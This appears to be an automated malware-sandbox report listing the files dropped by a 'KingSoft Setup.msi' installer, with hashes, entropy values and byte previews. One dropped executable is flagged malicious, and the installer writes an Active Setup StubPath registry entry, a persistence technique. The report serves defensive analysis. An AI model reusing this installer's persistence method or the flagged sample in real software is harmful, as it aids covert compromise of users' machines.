                                                                                                                                                                                                                                                  Size (bytes):551466
                                                                                                                                                                                                                                                  Entropy (8bit):6.435992166043616
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:4llcFz7UKez1EtOgU7Y4p4nle/DGWG5aS:4yz7UcU7Y4p4KGLp
                                                                                                                                                                                                                                                  MD5:13FF605783972DC773F7C2FA9F1BB3FF
                                                                                                                                                                                                                                                  SHA1:90812F2EBB225311F18216B5E31ECD1D936A24A4
                                                                                                                                                                                                                                                  SHA-256:B55352F6D69C75C5C0EFF68E6533B5EF1E610B8D0539F21BA2557CB960961B7D
                                                                                                                                                                                                                                                  SHA-512:3E0D9A97BE654C361AD0DBE58F0846666C50F94152A9D000F3EB328FC28DB84E1FDB9BFA216B50A791CECA0CECC6617727C43E2BB448F967A6B721A99CDDAC71
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.[.Y.@.....@.....@.....@.....@.....@......&.{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}..KingSoft..Setup.msi.@.....@.....@.....@........&.{2FA3CD4B-28FE-4C2B-80E4-DCE280079806}.....@.....@.....@.....@.......@.....@.....@.......@......KingSoft......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{54726178-C674-486D-854B-BD331D9F11FB}-.C:\Program Files (x86)\SoftPortable\KingSoft\.@.......@.....@.....@......&.{DE68DB34-02FE-4559-86D1-5AB24521AE4D}*.02:\Software\SoftPortable\KingSoft\Version.@.......@.....@.....@......&.{1123B093-4171-4C7B-A7CC-3322A7CCA975}`.02:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}\.@.......@.....@.....@......&.{05BD4742-3BAA-4DFE-8690-598F6240A7B3}h.02:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}\StubPath.@.......@.....@.....@.....

                                                                                                                                                                                                                                                  C:\Windows\Installer\MSI64FB.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):548192
                                                                                                                                                                                                                                                  Entropy (8bit):6.430181724276051
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:mllcFz7UKez1EtOgU7Y4p4nle/DGWG5ar:myz7UcU7Y4p4KGLo
                                                                                                                                                                                                                                                  MD5:250DA78FACCE68224B24D0FFAD65CA8E
                                                                                                                                                                                                                                                  SHA1:EA82B3EC612720DBF32206B4360CAE84430D13C8
                                                                                                                                                                                                                                                  SHA-256:8BCD09F9C97EEDD41FFAB51B55894DAF605FBB67CAE77AC073D2CBAACB5E2581
                                                                                                                                                                                                                                                  SHA-512:0BA6ECB45CF27E9E0997C0DF1F25846386799EFA6B198CE0E0A1A37BBA7463474E6F6C2D23CF2DF06EF21EBB722370268446F27B7E5087E7DF9D7B5DA4FDE4B2
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m<..)].\)].\)].\Y.].].\Y.]/].\9.]#].\9.];].\9.]}].\Y.]:].\Y.](].\Y.]2].\)].\.].\a.]2].\a.T\(].\)]<\(].\a.](].\Rich)].\........................PE..d....,Xg.........."....).....D.................@..........................................`.................................................(........p..8.......D@... ..`=..............p.......................(.......@............ ..0............................text...<........................... ..`.rdata...... ......................@..@.data....G..........................@....pdata..D@.......B..................@..@.fptable.....`......................@....rsrc...8....p......................@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\SourceHash{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.1629006092303782
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjoAGiLIlHVRpMh/7777777777777777777777777vDHFexmlUzhLp3XlN:JSQI5csxm4hl6F
                                                                                                                                                                                                                                                  MD5:174DF0D2F37F69A85035D299D8A11C9A
                                                                                                                                                                                                                                                  SHA1:939A7CF2537D8F053DF929C55980197B7DCABE3C
                                                                                                                                                                                                                                                  SHA-256:E4E47B3F77B173D924D96D7B33C78864312FD2B4102AFC425122408EFBD09630
                                                                                                                                                                                                                                                  SHA-512:4A67E329BABDF5C5CC47870ACDB5042836401CC7F9D85C124F1CD8E1CC12BAAD1392818766CD3B2C13DD081357C61DAF9DE1E17ACC7AE46982B48B674518088A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5672085462326921
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ip8PhluRc06WXOCnT5qpjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:Zhl1UnTokB9eRCtc
                                                                                                                                                                                                                                                  MD5:5CD2483213F16780FDB3A23002212936
                                                                                                                                                                                                                                                  SHA1:1AC6FE4A96210B59447C9B464D267120F524CFEE
                                                                                                                                                                                                                                                  SHA-256:CFF26BB450F19D827446A922CA07C74D4DB66D514580FD185A7D73C3D8359647
                                                                                                                                                                                                                                                  SHA-512:191F98856CDE86CE2B0A6E9A5E71EDAEF4E598861D1B09B9B152697AF57590327F1DAF9EA4E8BFDC55FF001C91AE4C9223CEEDFB4AEAECDECDD22589EE4C0BB9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):432221
                                                                                                                                                                                                                                                  Entropy (8bit):5.375179380207854
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauU:zTtbmkExhMJCIpEr9
                                                                                                                                                                                                                                                  MD5:DA7BB381056D2DD31D7E17CC062711A0
                                                                                                                                                                                                                                                  SHA1:D8B88A1BC4D267CFBEBC9A766D3D73574AFDCF33
                                                                                                                                                                                                                                                  SHA-256:A733E1B6C0FFD881613CC6B0F910B7B504E48CAFEE27AE954C457BB5A11E16B4
                                                                                                                                                                                                                                                  SHA-512:23A744617CEF7F03A59E3B96B67BD820F505639EA3DCE09CCA2815B93357A9FFD1F8878AC0CBD9086BFDFFDC1C0216305B1DFE9E728B07F31A6FEF4EC7FDE1E0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF173B7C7E9FFF027F.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF22CA2CD871D8F08A.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):73728
                                                                                                                                                                                                                                                  Entropy (8bit):0.13769810836132754
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:zzRdmESkdm5dmESkdmYVAEkrCy6ohovbA7p:zJO9eRCXk
                                                                                                                                                                                                                                                  MD5:EE3A6866B7CEB6475FFC1792F3990FE1
                                                                                                                                                                                                                                                  SHA1:CACAC0DE46381BDED218F315C9EC8F038A57D1D4
                                                                                                                                                                                                                                                  SHA-256:13A3B89390A3BFAF0D8284F194306489A8ED5052C93EA57B0C2FD4309A4E00EE
                                                                                                                                                                                                                                                  SHA-512:E5A4103325523774DC35CBD76F093F35E9066C39EE12E061F7310DF2F7C82EFF51DE594EEA5A16FF79F57ABDC61CC356A97FF6655CC74F05ADB325A5E41AD192
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF55F4083EC1B707B8.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF563642678E415E24.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):0.06938802215108525
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOexQzlUS0hgvHyVky6l3X:2F0i8n0itFzDHFexmlUzh23X
                                                                                                                                                                                                                                                  MD5:02F21F6F891CF8C01B114126E16EA4AA
                                                                                                                                                                                                                                                  SHA1:ADF0A0D0E104BAE6C24306A6B10FD4CD223743ED
                                                                                                                                                                                                                                                  SHA-256:FACC19DDB35B940212BD7E519C6DE453D92A3D3BA5FE751DEC6D7EA60CDAEC74
                                                                                                                                                                                                                                                  SHA-512:D81EE8A49DA45E9AA10C2020B4E435AB9AFB33569DFED5978A0DF6DFA1CEAB6FA47ED9E699A05C3698BC1BFCCD109791E23E8F02ADDBB8D686B3A3DB6388B815
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF645C1B2D9212CD61.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5672085462326921
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ip8PhluRc06WXOCnT5qpjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:Zhl1UnTokB9eRCtc
                                                                                                                                                                                                                                                  MD5:5CD2483213F16780FDB3A23002212936
                                                                                                                                                                                                                                                  SHA1:1AC6FE4A96210B59447C9B464D267120F524CFEE
                                                                                                                                                                                                                                                  SHA-256:CFF26BB450F19D827446A922CA07C74D4DB66D514580FD185A7D73C3D8359647
                                                                                                                                                                                                                                                  SHA-512:191F98856CDE86CE2B0A6E9A5E71EDAEF4E598861D1B09B9B152697AF57590327F1DAF9EA4E8BFDC55FF001C91AE4C9223CEEDFB4AEAECDECDD22589EE4C0BB9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF7C3860BC841536D1.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2550762963539281
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:TkduBNvcFXOxT5ypjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:IdDsTgkB9eRCtc
                                                                                                                                                                                                                                                  MD5:19C806CA065165AD2CF5EB453B704CEA
                                                                                                                                                                                                                                                  SHA1:3B0F0955F39C306A69F9AE428B805F44E3AAD649
                                                                                                                                                                                                                                                  SHA-256:74F50D7983617DDD0155719199DBE474A72FC31A092713CE748EB95DC1350E63
                                                                                                                                                                                                                                                  SHA-512:E3D1437627F41B0F6608353AA7DDD4111A691548676007FA9E7B592D4C19733259EE4C5903349331B543CA3EB582B585C8F1D22BFA0E5C6B34DC3D4DDF37DE2E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF8C10A95612283A87.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF9C3FFC679A51F14C.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2550762963539281
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:TkduBNvcFXOxT5ypjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:IdDsTgkB9eRCtc
                                                                                                                                                                                                                                                  MD5:19C806CA065165AD2CF5EB453B704CEA
                                                                                                                                                                                                                                                  SHA1:3B0F0955F39C306A69F9AE428B805F44E3AAD649
                                                                                                                                                                                                                                                  SHA-256:74F50D7983617DDD0155719199DBE474A72FC31A092713CE748EB95DC1350E63
                                                                                                                                                                                                                                                  SHA-512:E3D1437627F41B0F6608353AA7DDD4111A691548676007FA9E7B592D4C19733259EE4C5903349331B543CA3EB582B585C8F1D22BFA0E5C6B34DC3D4DDF37DE2E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFA6E4A4D9276FFA0D.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFA861BC7CE9F81CAC.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2550762963539281
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:TkduBNvcFXOxT5ypjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:IdDsTgkB9eRCtc
                                                                                                                                                                                                                                                  MD5:19C806CA065165AD2CF5EB453B704CEA
                                                                                                                                                                                                                                                  SHA1:3B0F0955F39C306A69F9AE428B805F44E3AAD649
                                                                                                                                                                                                                                                  SHA-256:74F50D7983617DDD0155719199DBE474A72FC31A092713CE748EB95DC1350E63
                                                                                                                                                                                                                                                  SHA-512:E3D1437627F41B0F6608353AA7DDD4111A691548676007FA9E7B592D4C19733259EE4C5903349331B543CA3EB582B585C8F1D22BFA0E5C6B34DC3D4DDF37DE2E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFBC573CA1A114F68D.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Temp\~DFC941315E61B6DAAE.TMP

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5672085462326921
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ip8PhluRc06WXOCnT5qpjbAddmESkdmYVAEkrCy6ohoxdmESkdmUC:Zhl1UnTokB9eRCtc
                                                                                                                                                                                                                                                  MD5:5CD2483213F16780FDB3A23002212936
                                                                                                                                                                                                                                                  SHA1:1AC6FE4A96210B59447C9B464D267120F524CFEE
                                                                                                                                                                                                                                                  SHA-256:CFF26BB450F19D827446A922CA07C74D4DB66D514580FD185A7D73C3D8359647
                                                                                                                                                                                                                                                  SHA-512:191F98856CDE86CE2B0A6E9A5E71EDAEF4E598861D1B09B9B152697AF57590327F1DAF9EA4E8BFDC55FF001C91AE4C9223CEEDFB4AEAECDECDD22589EE4C0BB9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  Chrome Cache Entry: 131

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2877)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):2882
                                                                                                                                                                                                                                                  Entropy (8bit):5.848446699047363
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:TxGpZKlgZ01LPcH6666oiknxMWl0BbHUl0t2n/cvMyL0nF0jBLAcuSEqmfQfffo:QpolilH6666/knxj0Hu0t2/cvMyOFeBc
                                                                                                                                                                                                                                                  MD5:5BB8327A4AB59F030CD96D153A5F65E4
                                                                                                                                                                                                                                                  SHA1:B54B016EE7BD2D39BFEE01B588CA6840EE59FD54
                                                                                                                                                                                                                                                  SHA-256:DD2B34EF5E6FD7705E01B7ADDEE295643920EF9A35D761EDAAA8DF5BA09F0921
                                                                                                                                                                                                                                                  SHA-512:53CEC836BA1DE0AF6613FC146B3C042B47FAB84716D581F18F5BD0D5B7B07A682E1E93B02209B4FAD071B27F1931AE249EF5BE6A6FEA0F5298F2901131B9AC82
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                  Preview:)]}'.["",["james gunn superman teaser","federal reserve interest rate cuts","indiana user great circle","pga tour showdown","tornado warning california scotts valley","nvidia stock","movie trailers","spacex falcon 9 rocket launch"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWtxcTUwM3JtEgpWaWRlbyBnYW1lMtcKZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFCUUFRQU1CSWdBQ0VRRURFUUgveEFBYkFBQURBUUFEQVFBQUFBQUFBQUFBQUFBQUJBWUNBd1VIQWYvRUFDNFFBQUlCQWdVQ0JRRUpBQUFBQUFBQUFBRUNBd1FSQUFVU0V5RUdNUlFpUVZGaGtRY1ZJek5DY1lIUjRmL0VBQmtCQUFNQUF3QUFBQUFBQUFBQUFBQUFBQUF

                                                                                                                                                                                                                                                  Chrome Cache Entry: 132

                                                                                                                                                                                                                                                  Download File
